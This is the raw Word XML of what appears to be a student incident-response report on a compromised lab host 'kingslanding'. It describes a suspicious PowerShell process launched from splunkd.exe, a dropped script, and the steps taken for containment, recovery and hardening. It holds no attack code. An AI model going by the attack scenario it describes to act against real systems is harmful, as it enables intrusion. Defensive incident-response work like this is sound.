          <w:ilvl w:val="0"/>
          <w:numId w:val="11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72020">
        <w:rPr>
          <w:rFonts w:eastAsia="system-ui" w:cs="system-ui"/>
          <w:color w:val="1F2328"/>
        </w:rPr>
        <w:t>Risk Level: High, due to potential for remote command execution and data exfiltration.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24C94A0C" w14:textId="4559DA72" w:rsidR="00372020" w:rsidRPr="00372020" w:rsidRDefault="00372020" w:rsidP="00372020">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="system-ui" w:cs="system-ui"/>
          <w:color w:val="1F2328"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="592A70F8" w14:textId="77777777" w:rsidR="00372020" w:rsidRPr="00372020" w:rsidRDefault="00372020" w:rsidP="00372020">
      <w:p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72020">
        <w:rPr>
          <w:rFonts w:eastAsia="system-ui" w:cs="system-ui"/>
          <w:color w:val="1F2328"/>
        </w:rPr>
        <w:t>Supporting Evidence</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C3CC64A" w14:textId="77777777" w:rsidR="00372020" w:rsidRPr="00372020" w:rsidRDefault="00372020" w:rsidP="00372020">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12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72020">
        <w:rPr>
          <w:rFonts w:eastAsia="system-ui" w:cs="system-ui"/>
          <w:color w:val="1F2328"/>
        </w:rPr>
        <w:t>Log Snippets:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C922DE8" w14:textId="3B4BCAE8" w:rsidR="64E10EA2" w:rsidRPr="00016EF6" w:rsidRDefault="64E10EA2" w:rsidP="00372020">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="system-ui" w:cs="system-ui"/>
          <w:color w:val="1F2328"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5D294AC2" w14:textId="77777777" w:rsidR="00372020" w:rsidRPr="00016EF6" w:rsidRDefault="00372020" w:rsidP="00372020">
      <w:r w:rsidRPr="00016EF6">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6B63D823" wp14:editId="7067B74A">
            <wp:extent cx="5943600" cy="304800"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="190683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75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5CD32" w14:textId="77777777" w:rsidR="00372020" w:rsidRPr="00016EF6" w:rsidRDefault="00372020" w:rsidP="00372020">
      <w:r w:rsidRPr="00016EF6">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="55EF8665" wp14:editId="6103BBE9">
            <wp:extent cx="5943600" cy="182880"/>
            <wp:effectExtent l="0" t="0" r="0" b="7620"/>
            <wp:docPr id="120782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11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DAD0B" w14:textId="77777777" w:rsidR="00372020" w:rsidRPr="00016EF6" w:rsidRDefault="00372020" w:rsidP="00372020">
      <w:r w:rsidRPr="00016EF6">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="674CD713" wp14:editId="09E3D04B">
            <wp:extent cx="5943600" cy="212725"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="16554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22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231D" w14:textId="77777777" w:rsidR="00372020" w:rsidRPr="00016EF6" w:rsidRDefault="00372020" w:rsidP="00372020">
      <w:r w:rsidRPr="00016EF6">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="03BA7F4D" wp14:editId="24B26D57">
            <wp:extent cx="5943600" cy="341630"/>
            <wp:effectExtent l="0" t="0" r="0" b="1270"/>
            <wp:docPr id="201575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240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CD9F" w14:textId="6732FF41" w:rsidR="023B20B9" w:rsidRPr="00016EF6" w:rsidRDefault="00372020">
      <w:r w:rsidRPr="00016EF6">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2A775B1F" wp14:editId="30129777">
            <wp:extent cx="5943600" cy="1224915"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1835562820" name="Picture 1" descr="A computer code with many lett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99629" name="Picture 1" descr="A computer code with many letters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DE4F6" w14:textId="77777777" w:rsidR="003D0795" w:rsidRPr="00016EF6" w:rsidRDefault="003D0795"/>
    <w:p w14:paraId="713CA364" w14:textId="560D3D6A" w:rsidR="003D0795" w:rsidRPr="003D0795" w:rsidRDefault="64E10EA2" w:rsidP="003D0795">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00016EF6">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Containment and Neutralization (Short-term/Triage)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E552299" w14:textId="77777777" w:rsidR="003D0795" w:rsidRPr="003D0795" w:rsidRDefault="003D0795" w:rsidP="003D0795">
      <w:p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D0795">
        <w:rPr>
          <w:rFonts w:eastAsia="system-ui" w:cs="system-ui"/>
          <w:color w:val="1F2328"/>
        </w:rPr>
        <w:t>Short-term Actions to Contain the Incident:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="631D1761" w14:textId="77777777" w:rsidR="003D0795" w:rsidRPr="003D0795" w:rsidRDefault="003D0795" w:rsidP="003D0795">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14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D0795">
        <w:rPr>
          <w:rFonts w:eastAsia="system-ui" w:cs="system-ui"/>
          <w:color w:val="1F2328"/>
        </w:rPr>
        <w:t>Disconnect the System:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E16CF3C" w14:textId="77777777" w:rsidR="003D0795" w:rsidRPr="003D0795" w:rsidRDefault="003D0795" w:rsidP="003D0795">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="14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D0795">
        <w:rPr>
          <w:rFonts w:eastAsia="system-ui" w:cs="system-ui"/>
          <w:color w:val="1F2328"/>
        </w:rPr>
        <w:t xml:space="preserve">Disconnected </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003D0795">
        <w:rPr>
          <w:rFonts w:eastAsia="system-ui" w:cs="system-ui"/>
          <w:color w:val="1F2328"/>
        </w:rPr>
        <w:t>kingslanding</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003D0795">
        <w:rPr>
          <w:rFonts w:eastAsia="system-ui" w:cs="system-ui"/>
          <w:color w:val="1F2328"/>
        </w:rPr>
        <w:t xml:space="preserve"> from the network to stop communication with external systems.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C191952" w14:textId="77777777" w:rsidR="003D0795" w:rsidRPr="003D0795" w:rsidRDefault="003D0795" w:rsidP="003D0795">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14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D0795">
        <w:rPr>
          <w:rFonts w:eastAsia="system-ui" w:cs="system-ui"/>
          <w:color w:val="1F2328"/>
        </w:rPr>
        <w:t>Stop Malicious Processes:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69ED479D" w14:textId="77777777" w:rsidR="003D0795" w:rsidRPr="003D0795" w:rsidRDefault="003D0795" w:rsidP="003D0795">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="14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D0795">
        <w:rPr>
          <w:rFonts w:eastAsia="system-ui" w:cs="system-ui"/>
          <w:color w:val="1F2328"/>
        </w:rPr>
        <w:t>Killed the suspicious powershell.exe process (ID: 1576) and its parent process splunkd.exe.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EE1305F" w14:textId="77777777" w:rsidR="003D0795" w:rsidRPr="003D0795" w:rsidRDefault="003D0795" w:rsidP="003D0795">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14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D0795">
        <w:rPr>
          <w:rFonts w:eastAsia="system-ui" w:cs="system-ui"/>
          <w:color w:val="1F2328"/>
        </w:rPr>
        <w:t>Disable Remote Access:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30097A4A" w14:textId="77777777" w:rsidR="003D0795" w:rsidRPr="003D0795" w:rsidRDefault="003D0795" w:rsidP="003D0795">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="14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D0795">
        <w:rPr>
          <w:rFonts w:eastAsia="system-ui" w:cs="system-ui"/>
          <w:color w:val="1F2328"/>
        </w:rPr>
        <w:t>Turned off PowerShell remoting to block external control.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76A53130" w14:textId="039E797A" w:rsidR="003D0795" w:rsidRPr="003D0795" w:rsidRDefault="003D0795" w:rsidP="003D0795">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="system-ui" w:cs="system-ui"/>
          <w:color w:val="1F2328"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3A5CE324" w14:textId="77777777" w:rsidR="003D0795" w:rsidRPr="003D0795" w:rsidRDefault="003D0795" w:rsidP="003D0795">
      <w:p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D0795">
        <w:rPr>
          <w:rFonts w:eastAsia="system-ui" w:cs="system-ui"/>
          <w:color w:val="1F2328"/>
        </w:rPr>
        <w:t>How to Isolate the Affected Systems:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1882BAB7" w14:textId="77777777" w:rsidR="003D0795" w:rsidRPr="003D0795" w:rsidRDefault="003D0795" w:rsidP="003D0795">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15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D0795">
        <w:rPr>
          <w:rFonts w:eastAsia="system-ui" w:cs="system-ui"/>
          <w:color w:val="1F2328"/>
        </w:rPr>
        <w:t>Network Isolation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A41C1C4" w14:textId="77777777" w:rsidR="003D0795" w:rsidRPr="003D0795" w:rsidRDefault="003D0795" w:rsidP="003D0795">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="15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D0795">
        <w:rPr>
          <w:rFonts w:eastAsia="system-ui" w:cs="system-ui"/>
          <w:color w:val="1F2328"/>
        </w:rPr>
        <w:t>Disconnected the affected system from the network to prevent further interactions with attackers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77B35A63" w14:textId="77777777" w:rsidR="003D0795" w:rsidRPr="003D0795" w:rsidRDefault="003D0795" w:rsidP="003D0795">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15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D0795">
        <w:rPr>
          <w:rFonts w:eastAsia="system-ui" w:cs="system-ui"/>
          <w:color w:val="1F2328"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Disable User Account:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="369F6E2B" w14:textId="77777777" w:rsidR="003D0795" w:rsidRPr="003D0795" w:rsidRDefault="003D0795" w:rsidP="003D0795">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="15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D0795">
        <w:rPr>
          <w:rFonts w:eastAsia="system-ui" w:cs="system-ui"/>
          <w:color w:val="1F2328"/>
        </w:rPr>
        <w:t>Disabled the SEVENKINGDOMS\vagrant user account to stop any further logins.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D52382C" w14:textId="77777777" w:rsidR="003D0795" w:rsidRPr="003D0795" w:rsidRDefault="003D0795" w:rsidP="003D0795">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15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D0795">
        <w:rPr>
          <w:rFonts w:eastAsia="system-ui" w:cs="system-ui"/>
          <w:color w:val="1F2328"/>
        </w:rPr>
        <w:t>Prevent Malicious Scripts:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7641AD93" w14:textId="77777777" w:rsidR="003D0795" w:rsidRPr="003D0795" w:rsidRDefault="003D0795" w:rsidP="003D0795">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="15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D0795">
        <w:rPr>
          <w:rFonts w:eastAsia="system-ui" w:cs="system-ui"/>
          <w:color w:val="1F2328"/>
        </w:rPr>
        <w:t>Restricted access to the Temp folder where the malicious script was dropped.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50ACC614" w14:textId="2F1BA72F" w:rsidR="003D0795" w:rsidRPr="003D0795" w:rsidRDefault="003D0795" w:rsidP="003D0795">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="system-ui" w:cs="system-ui"/>
          <w:color w:val="1F2328"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0F37D9D7" w14:textId="77777777" w:rsidR="003D0795" w:rsidRPr="003D0795" w:rsidRDefault="003D0795" w:rsidP="003D0795">
      <w:p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D0795">
        <w:rPr>
          <w:rFonts w:eastAsia="system-ui" w:cs="system-ui"/>
          <w:color w:val="1F2328"/>
        </w:rPr>
        <w:t>Temporary Measures to Stop Further Damage:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CACC826" w14:textId="77777777" w:rsidR="003D0795" w:rsidRPr="003D0795" w:rsidRDefault="003D0795" w:rsidP="003D0795">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16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D0795">
        <w:rPr>
          <w:rFonts w:eastAsia="system-ui" w:cs="system-ui"/>
          <w:color w:val="1F2328"/>
        </w:rPr>
        <w:t>Remove Suspicious Files:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B8738BD" w14:textId="77777777" w:rsidR="003D0795" w:rsidRPr="003D0795" w:rsidRDefault="003D0795" w:rsidP="003D0795">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="16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D0795">
        <w:rPr>
          <w:rFonts w:eastAsia="system-ui" w:cs="system-ui"/>
          <w:color w:val="1F2328"/>
        </w:rPr>
        <w:t>Deleted or quarantined the malicious PowerShell script (__PSScriptPolicyTest_mwnd3bsv.ven.ps1).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D9889E5" w14:textId="77777777" w:rsidR="003D0795" w:rsidRPr="003D0795" w:rsidRDefault="003D0795" w:rsidP="003D0795">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16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D0795">
        <w:rPr>
          <w:rFonts w:eastAsia="system-ui" w:cs="system-ui"/>
          <w:color w:val="1F2328"/>
        </w:rPr>
        <w:t>Increase Monitoring:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FEEEADC" w14:textId="77777777" w:rsidR="003D0795" w:rsidRPr="003D0795" w:rsidRDefault="003D0795" w:rsidP="003D0795">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="16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D0795">
        <w:rPr>
          <w:rFonts w:eastAsia="system-ui" w:cs="system-ui"/>
          <w:color w:val="1F2328"/>
        </w:rPr>
        <w:t>Set up extra monitoring on the system to catch any more suspicious activity.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BB4DD81" w14:textId="77777777" w:rsidR="003D0795" w:rsidRPr="003D0795" w:rsidRDefault="003D0795" w:rsidP="003D0795">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16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D0795">
        <w:rPr>
          <w:rFonts w:eastAsia="system-ui" w:cs="system-ui"/>
          <w:color w:val="1F2328"/>
        </w:rPr>
        <w:t>Run Security Scans:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3378C7E2" w14:textId="74EF8DF0" w:rsidR="023B20B9" w:rsidRPr="00016EF6" w:rsidRDefault="003D0795" w:rsidP="003D0795">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="16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3D0795">
        <w:rPr>
          <w:rFonts w:eastAsia="system-ui" w:cs="system-ui"/>
          <w:color w:val="1F2328"/>
        </w:rPr>
        <w:t>Used antivirus or EDR tools to scan for other malware on the system.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D488EE4" w14:textId="77777777" w:rsidR="003D0795" w:rsidRPr="00016EF6" w:rsidRDefault="003D0795" w:rsidP="003D0795">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="system-ui" w:cs="system-ui"/>
          <w:color w:val="1F2328"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="03D17D11" w14:textId="06901BC4" w:rsidR="64E10EA2" w:rsidRPr="00016EF6" w:rsidRDefault="64E10EA2" w:rsidP="023B20B9">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00016EF6">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Recovery and Vulnerability Remediation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24FAC766" w14:textId="6A769718" w:rsidR="00CF4AD8" w:rsidRPr="00CF4AD8" w:rsidRDefault="00CF4AD8" w:rsidP="00CF4AD8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eastAsia="system-ui" w:cs="system-ui"/>
          <w:color w:val="1F2328"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CF4AD8">
        <w:rPr>
          <w:rFonts w:eastAsia="system-ui" w:cs="system-ui"/>
          <w:color w:val="1F2328"/>
        </w:rPr>
        <w:t>System Restoration: Reimaged affected system and restored from backups.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43C04A87" w14:textId="21471B3C" w:rsidR="00CF4AD8" w:rsidRPr="00CF4AD8" w:rsidRDefault="00CF4AD8" w:rsidP="00CF4AD8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eastAsia="system-ui" w:cs="system-ui"/>
          <w:color w:val="1F2328"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CF4AD8">
        <w:rPr>
          <w:rFonts w:eastAsia="system-ui" w:cs="system-ui"/>
          <w:color w:val="1F2328"/>
        </w:rPr>
        <w:t>Password Reset: Changed passwords for affected accounts.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42F7F8E8" w14:textId="036B7B87" w:rsidR="00CF4AD8" w:rsidRPr="00CF4AD8" w:rsidRDefault="00CF4AD8" w:rsidP="00CF4AD8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eastAsia="system-ui" w:cs="system-ui"/>
          <w:color w:val="1F2328"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CF4AD8">
        <w:rPr>
          <w:rFonts w:eastAsia="system-ui" w:cs="system-ui"/>
          <w:color w:val="1F2328"/>
        </w:rPr>
        <w:t>Vulnerability Patching: Applied critical patches and security updates.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D057A7F" w14:textId="3A32C86C" w:rsidR="023B20B9" w:rsidRPr="00016EF6" w:rsidRDefault="00CF4AD8" w:rsidP="00CF4AD8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eastAsia="system-ui" w:cs="system-ui"/>
          <w:color w:val="1F2328"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00016EF6">
        <w:rPr>
          <w:rFonts w:eastAsia="system-ui" w:cs="system-ui"/>
          <w:color w:val="1F2328"/>
        </w:rPr>
        <w:t>Integrity Checks: Verified system files and configurations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24F6E0B5" w14:textId="2A4A3A9D" w:rsidR="64E10EA2" w:rsidRPr="00016EF6" w:rsidRDefault="64E10EA2" w:rsidP="023B20B9">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00016EF6">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Hardening and Detection Improvements (Lessons Learned, Long-term Response)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EFBD068" w14:textId="1D2DC7E5" w:rsidR="00016EF6" w:rsidRPr="00016EF6" w:rsidRDefault="00016EF6" w:rsidP="00016EF6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
      </w:pPr>
      <w:r w:rsidRPr="00016EF6">
        <w:t>Access Controls: Implemented multi-factor authentication and restricted admin access.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D770072" w14:textId="7CA91336" w:rsidR="00016EF6" w:rsidRPr="00016EF6" w:rsidRDefault="00016EF6" w:rsidP="00016EF6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
      </w:pPr>
      <w:r w:rsidRPr="00016EF6">
        <w:t>PowerShell Security: Blocked unauthorized PowerShell scripts.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4958E703" w14:textId="11487A1B" w:rsidR="00016EF6" w:rsidRPr="00016EF6" w:rsidRDefault="00016EF6" w:rsidP="00016EF6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
      </w:pPr>
      <w:r w:rsidRPr="00016EF6">
        <w:t>Network Segmentation: Improved network isolation to prevent lateral movement.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72A33082" w14:textId="7830122F" w:rsidR="00016EF6" w:rsidRPr="00016EF6" w:rsidRDefault="00016EF6" w:rsidP="00016EF6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
      </w:pPr>
      <w:r w:rsidRPr="00016EF6">
        <w:t>Monitoring and Detection: Enhanced SIEM rules and deployed endpoint monitoring.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D9D1BDC" w14:textId="07071D91" w:rsidR="00AA1C4F" w:rsidRPr="00016EF6" w:rsidRDefault="00016EF6" w:rsidP="00016EF6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</w:pPr>
      <w:r w:rsidRPr="00016EF6">
        <w:t>Security Audits: Conducted regular security reviews and tests.</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00AA1C4F" w:rsidRPr="00016E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E5555"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="C1E2A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E5850"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="7EFE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E7CC0"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="59EC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F31B4"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="1A98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7AF73"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="D6ECD70A"/>
    <w:lvl w:ilvl="0" w:tplc="14EE2C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EA78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024F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50E9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6A77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3AE1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B01F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D0E0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224F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6164FB"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="7B36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078F2"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="63D2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4E6FC4"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="0C6CF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671341"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="AE0A3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784CAF"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="1124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082C05"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="E4F4F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DB474D"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="4834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7B0177"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="A306C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725C25"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="7AF4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8E5BD3"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="001A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B327C7"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="65D4E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2007454">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="1409811767">
    <w:abstractNumId w:val="9"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="601298250">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="345060138">
    <w:abstractNumId w:val="14"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="37359286">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="6" w16cid:durableId="496304893">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="7" w16cid:durableId="410784238">
    <w:abstractNumId w:val="11"/>
  </w:num>
  <w:num w:numId="8" w16cid:durableId="61341847">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="9" w16cid:durableId="1245148309">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="10" w16cid:durableId="1574049550">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="11" w16cid:durableId="618223544">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="12" w16cid:durableId="500849756">
    <w:abstractNumId w:val="13"/>
  </w:num>
  <w:num w:numId="13" w16cid:durableId="1634213378">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="14" w16cid:durableId="1723361783">
    <w:abstractNumId w:val="10"/>
  </w:num>
  <w:num w:numId="15" w16cid:durableId="459618459">
    <w:abstractNumId w:val="15"/>
  </w:num>
  <w:num w:numId="16" w16cid:durableId="4166796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3332C88"/>
    <w:rsid w:val="00016EF6"/>
    <w:rsid w:val="000F1D73"/>
    <w:rsid w:val="00146533"/>
    <w:rsid w:val="00372020"/>
    <w:rsid w:val="003D0795"/>
    <w:rsid w:val="00461A99"/>
    <w:rsid w:val="00567A97"/>
    <w:rsid w:val="005B2090"/>
    <w:rsid w:val="005B5B04"/>
    <w:rsid w:val="006C667C"/>
    <w:rsid w:val="00727B78"/>
    <w:rsid w:val="007D02A1"/>
    <w:rsid w:val="007F43BB"/>
    <w:rsid w:val="008079D2"/>
    <w:rsid w:val="008351B9"/>
    <w:rsid w:val="009F73C4"/>
    <w:rsid w:val="00A778B2"/>
    <w:rsid w:val="00AA1C4F"/>
    <w:rsid w:val="00B03813"/>
    <w:rsid w:val="00BA0769"/>
    <w:rsid w:val="00C502B9"/>
    <w:rsid w:val="00C60009"/>
    <w:rsid w:val="00CF4AD8"/>
    <w:rsid w:val="00D564E8"/>
    <w:rsid w:val="00D61188"/>
    <w:rsid w:val="00D813B9"/>
    <w:rsid w:val="00FB2161"/>
    <w:rsid w:val="00FB5BCA"/>
    <w:rsid w:val="0140492E"/>
    <w:rsid w:val="023B20B9"/>
    <w:rsid w:val="18262D4A"/>
    <w:rsid w:val="1A2B0FD2"/>
    <w:rsid w:val="221B080B"/>
    <w:rsid w:val="240CA8C8"/>
    <w:rsid w:val="2E40EEFC"/>
    <w:rsid w:val="43332C88"/>
    <w:rsid w:val="4C62D5D3"/>
    <w:rsid w:val="54110779"/>
    <w:rsid w:val="556B1EF4"/>
    <w:rsid w:val="642C7E25"/>
    <w:rsid w:val="64E10EA2"/>
    <w:rsid w:val="7123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32C88"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{9BA16B1B-4D9C-4CE3-B6FE-464F4A5E0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2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861</Words>
  <Characters>4914</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>40</Lines>
  <Paragraphs>11</Paragraphs>
  <ScaleCrop>false</ScaleCrop>
  <Company/>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>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Templeton</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Sebastian Salas Arancbia</cp:lastModifiedBy>
  <cp:revision>28</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2024-12-11T05:15:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-12-11T06:14:00Z</dcterms:modified>
</cp:coreProperties>
</file>